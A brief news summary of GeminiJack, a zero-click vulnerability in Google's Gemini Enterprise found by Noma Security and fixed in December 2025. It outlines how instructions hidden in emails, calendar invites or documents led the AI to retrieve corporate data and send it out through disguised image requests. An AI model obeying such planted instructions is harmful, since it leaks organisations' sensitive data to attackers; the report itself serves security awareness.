On December 11, 2025, Google resolved a critical zero-click vulnerability known as GeminiJack in its Gemini Enterprise platform, which could lead to significant corporate data exfiltration through crafted emails, calendar invites, or documents. Discovered by Noma Security, this flaw allowed attackers to manipulate AI functionalities without user interaction, exposing sensitive information seamlessly. By embedding malicious instructions in seemingly benign documents, hackers exploited Google’s AI system to search for and retrieve targeted data, subsequently exfiltrating it via disguised image requests. This incident highlights a new category of AI-native vulnerabilities, emphasizing the need for heightened security measures within AI-integrated platforms. Although Google has remedied the specific flaw, the report urges ongoing vigilance against indirect prompt injection attacks within retrieval-augmented generation (RAG) systems to protect organizational data effectively. As AI becomes more deeply embedded in enterprise solutions, adapting security strategies is crucial for safeguarding corporate information.
Source link
